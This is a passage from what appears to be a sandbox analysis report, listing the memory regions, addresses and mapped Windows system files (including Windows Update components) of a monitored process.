"c:\\windows\\system32\\wevtapi.dll") Region: id = 1294 start_va = 0x7fefd1c0000 end_va = 0x7fefd1d3fff monitored = 0 entry_point = 0x7fefd1c4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1295 start_va = 0x7fefd420000 end_va = 0x7fefd442fff monitored = 0 entry_point = 0x7fefd421198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1296 start_va = 0x7fefd4c0000 end_va = 0x7fefd4cafff monitored = 0 entry_point = 0x7fefd4c1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1297 start_va = 0x7fefd4f0000 end_va = 0x7fefd514fff monitored = 0 entry_point = 0x7fefd4f9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1298 start_va = 0x7fefd520000 end_va = 0x7fefd52efff monitored = 0 entry_point = 0x7fefd521010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1299 start_va = 0x7fefd530000 end_va = 0x7fefd5c0fff monitored = 0 entry_point = 0x7fefd531440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1300 start_va = 0x7fefd5d0000 end_va = 0x7fefd60cfff monitored = 0 entry_point = 0x7fefd5d18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1301 start_va = 0x7fefd610000 end_va = 0x7fefd623fff monitored = 0 entry_point = 0x7fefd6110e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1302 start_va = 0x7fefd630000 end_va = 0x7fefd63efff monitored = 0 entry_point = 0x7fefd6319b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1303 start_va = 0x7fefd6d0000 end_va = 0x7fefd6defff monitored = 0 entry_point = 0x7fefd6d1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1304 start_va = 0x7fefd6e0000 end_va = 0x7fefd6f9fff monitored = 0 entry_point = 0x7fefd6e1558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1305 start_va = 0x7fefd700000 end_va = 0x7fefd735fff monitored = 0 entry_point = 0x7fefd701474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1306 start_va = 0x7fefd7e0000 end_va = 0x7fefd84bfff monitored = 0 entry_point = 0x7fefd7e2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1307 start_va = 0x7fefd850000 end_va = 0x7fefd9bcfff monitored = 0 entry_point = 0x7fefd8510b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1308 start_va = 0x7fefd9c0000 end_va = 0x7fefd9fafff monitored = 0 entry_point = 0x7fefd9c1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1309 start_va = 0x7fefda00000 end_va = 0x7fefdb2cfff monitored = 0 entry_point = 0x7fefda4ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1310 start_va = 0x7fefdb30000 end_va = 0x7fefdbf8fff monitored = 0 entry_point = 0x7fefdbaa874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1311 start_va = 0x7fefdc00000 end_va = 0x7fefdc0dfff monitored = 0 entry_point = 0x7fefdc01080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1312 start_va = 0x7fefdc10000 end_va = 0x7fefdc17fff monitored = 0 entry_point = 0x7fefdc11504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1313 start_va = 0x7fefdc20000 end_va = 0x7fefdc90fff monitored = 0 entry_point = 0x7fefdc31e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1314 start_va = 0x7fefdca0000 end_va = 0x7fefdd06fff monitored = 0 entry_point = 0x7fefdcab03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1315 start_va = 0x7fefdd10000 end_va = 0x7fefdd5cfff monitored = 0 entry_point = 0x7fefdd11070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1316 start_va = 0x7fefdd60000 end_va = 0x7fefdd7efff monitored = 0 entry_point = 0x7fefdd660e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1317 start_va = 0x7fefdd80000 end_va = 0x7fefdf82fff monitored = 0 entry_point = 0x7fefdda3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1318 start_va = 0x7fefdf90000 end_va = 0x7fefdfe1fff monitored = 0 entry_point = 0x7fefdf910d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1319 start_va = 0x7fefdff0000 end_va = 0x7fefe01dfff monitored = 0 entry_point = 0x7fefdff1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1320 start_va = 0x7fefe020000 end_va = 0x7fefe0fafff monitored = 0 entry_point = 0x7fefe040760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1321 start_va = 0x7fefe280000 end_va = 0x7fefe456fff monitored = 0 entry_point = 0x7fefe281010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1322 start_va = 0x7fefe4e0000 end_va = 0x7fefe5e8fff monitored = 0 entry_point = 0x7fefe4e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1323 start_va = 0x7fefe850000 end_va = 0x7fefe8e8fff monitored = 0 entry_point = 0x7fefe851c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1324 start_va = 0x7fefe8f0000 end_va = 0x7fefe9c6fff monitored = 0 entry_point = 0x7fefe8f3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1325 start_va = 0x7fefea70000 end_va = 0x7feff7f7fff monitored = 0 entry_point = 0x7fefeaecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1326 start_va = 0x7feff930000 end_va = 0x7feff9cefff monitored = 0 entry_point = 0x7feff9325a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1327 start_va = 0x7feffa00000 end_va = 0x7feffa00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1328 start_va = 0x7fffff44000 end_va = 0x7fffff45fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff44000" filename = "" Region: id = 1329 start_va = 0x7fffff46000 end_va = 0x7fffff47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff46000" filename = "" Region: id = 1330 start_va = 0x7fffff48000 end_va = 0x7fffff49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff48000" filename = "" Region: id = 1331 start_va = 0x7fffff4a000 end_va = 0x7fffff4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4a000" filename = "" Region: id = 1332 start_va = 0x7fffff4c000 end_va = 0x7fffff4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4c000" filename = "" Region: id = 1333 start_va = 0x7fffff4e000 end_va = 0x7fffff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff4e000" filename = "" Region: id = 1334 start_va = 0x7fffff50000 end_va = 0x7fffff51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff50000" filename = "" Region: id = 1335 start_va = 0x7fffff52000 end_va = 0x7fffff53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff52000" filename = "" Region: id = 1336 start_va = 0x7fffff54000 end_va = 0x7fffff55fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff54000" filename = "" Region: id = 1337 start_va = 0x7fffff56000 end_va = 0x7fffff57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff56000" filename = "" Region: id = 1338 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1339 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 1340 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1341 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1342 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1343 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 1344 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1345 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1346 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 1347 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 1348 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1349 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1350 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1351 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1352 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1353 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1354 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1355 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1356 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1357 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1358 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1359 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1360 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1361 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1362 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1363 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1364 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1365 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1366 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1367 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1368 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1369 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1370 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1371 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1372 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1373 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1374 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1375 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1376 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1377 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1378 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1379 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2156 start_va = 0x7fef1bb0000 end_va = 0x7fef1d83fff monitored = 0 entry_point = 0x7fef1be6b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 2157 start_va = 0x33c0000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 2158 start_va = 0x1730000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 2159 start_va = 0x30a0000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 2160 start_va = 0x5df0000 end_va = 0x61effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename = "" Region: id = 2161 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 2164 start_va = 0x8e0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 2165 start_va = 0x2b60000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 2166 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2167 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2168 start_va = 0x7fef87c0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef87c11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 2169 start_va = 0x4240000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 2170 start_va = 0x910000 end_va = 0x912fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 2171 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2172 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2173 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2174 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2175 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2176 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2177 start_va = 0x2130000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 2178 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 2179 start_va = 0x30a0000 end_va = 0x311ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 2180 start_va = 0x3120000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 2181 start_va = 0x3410000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 2182 start_va = 0x3520000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 2183 start_va = 0x35a0000 end_va = 0x3649fff monitored = 0 entry_point = 0x35a4104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2184 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2185 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2186 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2187 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2188 start_va = 0x920000 end_va = 0x92cfff monitored = 0 entry_point = 0x92a138 region_type = mapped_file name = "wuauclt.exe" filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe") Region: id = 2189 start_va = 0x61f0000 end_va = 0x643efff monitored = 0 entry_point = 0x61f236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 2190 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 2191 start_va = 0x35b0000 end_va = 0x362ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2192 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2193 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 2194 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2195 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2196 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2197 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2198 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2199 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2200 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2201 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2202 start_va = 0x9e0000 end_va = 0xa0efff monitored = 0 entry_point = 0x9e1060 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2203 start_va = 0x9e0000 end_va = 0xa0efff monitored = 0 entry_point = 0x9e1060 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2204 start_va = 0x9e0000 end_va = 0xa0efff monitored = 0 entry_point = 0x9e1060 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2205 start_va = 0x9e0000 end_va = 0xa0efff monitored = 0 entry_point = 0x9e1060 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2206 start_va = 0x9e0000 end_va = 0xa0efff monitored = 0 entry_point = 0x9e1060 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2207 start_va = 0x7fef0940000 end_va = 0x7fef0971fff monitored = 0 entry_point = 0x7fef0941060 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2208 start_va = 0x900000 end_va = 0x90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2209 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2210 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2211 start_va = 0x900000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 2212 start_va = 0x930000 end_va = 0x93ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2213 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2214 start_va = 0x930000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2215 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 4254 